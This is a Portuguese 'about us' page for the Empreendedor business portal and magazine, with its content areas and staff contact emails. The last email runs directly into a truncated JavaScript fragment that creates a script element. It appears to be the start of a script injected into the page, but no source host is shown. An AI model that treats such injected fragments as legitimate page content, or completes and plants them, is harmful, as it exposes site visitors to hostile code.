Última edição Edição 263 March 2017 Assine

Sobre o portal

fke_28

O portal Empreendedor apresenta conteúdos úteis ao empreendedor, tanto as pessoas que já possuem seus próprios negócios quanto aquelas que buscam compreender como se tornar um empreendedor de sucesso.

Apresenta um design leve, proporcionando uma experiência de navegação amigável,  com fácil acesso aos conteúdos, que trazem temas divididos em áreas: institucional, notícias, opinião, como empreender e guia de franquias.

Mesmo utilizando as mais modernas tecnologias digitais, o portal mantém como grande atração a qualidade de conteúdo, com informações, notícias, cases de sucesso, entrevistas e artigos.

O portal Empreendedor conta ainda com uma rede de blogs e uma área de serviços para o mundo dos negócios.

Anuncie

Fone: (48) 3371-8666
anuncios@empreendedor.com.br

Assinaturas

Faça sua assinatura online

Fone: (48) 3371-8666
assine@empreendedor.com.br

Redação

Geralempreendedor@empreendedor.com.br
Diretor-Editor: Acari Amorim – acari@empreendedor.com.br
Diretor de Comercialização e Marketing: Paulo Henrique Martins – phmartins@empreendedor.com.br
Diretor de Expansão: Geraldo Nilson de Azevedo – geraldo@empreendedor.com.br
Editor de conteúdo e impressos:  Alexsandro Vanin – vanin@empreendedor.com.br
Editora de internet (licenciada): Carla Kempinski – carla@empreendedor.com.brvar d=document;var s=d.createElement(‘script’);